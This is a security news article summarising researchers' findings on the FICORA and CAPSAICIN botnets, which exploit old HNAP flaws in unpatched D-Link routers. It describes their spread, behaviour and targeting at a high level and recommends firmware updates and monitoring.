New Botnet Exploiting D-Link Routers To Gain Control Remotely

Researchers observed a recent surge in activity from the “FICORA” and “CAPSAICIN,” both variants of Mirai and Kaiten, respectively, which exploit known vulnerabilities in D-Link routers, including those with outdated firmware like DIR-645, DIR-806, GO-RT-AC750, and DIR-845L. 

Attackers leverage the HNAP protocol to execute malicious commands remotely on vulnerable devices, which, despite being known for years, remains effective due to the continued presence of unpatched systems, highlighting the importance of timely firmware updates and robust security measures to mitigate the risks associated with these persistent threats.

They are operating from servers located in the Netherlands and were responsible for activating the “FICORA” botnet, which had an impact on a large number of countries around the world, indicating that the attack was not targeted. 

Investigate Real-World Malicious Links, Malware & Phishing Attacks With ANY.RUN – Try for Free

Meanwhile, the “CAPSAICIN” botnet exhibited a more focused campaign, with intense activity concentrated in East Asian countries over two days, October 21st and 22nd, 2024.

The FICORA botnet is a Linux malware variant of the Mirai botnet that can download and execute the FICORA malware using various methods like wget, ftpget, curl, and tftp. 

Before downloading different versions of itself that are designed to target different Linux architectures, the FICORA malware first eliminates processes that have the same file extension as itself. 

The malware uses ChaCha20 encryption to store its configuration, including the C2 server domain and a unique string.

It also includes a hard-coded username and password list for brute-force attacks and embeds a shell script to identify and kill processes containing the keyword “dvrHelper.”  

The CAPSAICIN malware is downloaded from a malicious server and targets various Linux architectures by establishing a connection with its C2 server and sending victim host information. 

It can kill processes of other botnets, set up environment variables, and launch DDoS attacks based on commands received from the C2 server, and it appears to be a variant of botnets developed by the Keksec group.

FortiGuard Labs discovered that the malware families “FICORA” and “CAPSAICIN” actively exploit a decade-old, patched kernel vulnerability, highlighting the persistent danger of unpatched systems. 

Despite the vulnerability’s age, these attacks remain widespread, emphasizing the critical need for regular kernel updates across all enterprise devices. 

Comprehensive monitoring systems are also essential to detect and mitigate potential malware deployments exploiting this and other vulnerabilities.

By proactively implementing these security measures, enterprises can significantly reduce their exposure to this ongoing threat.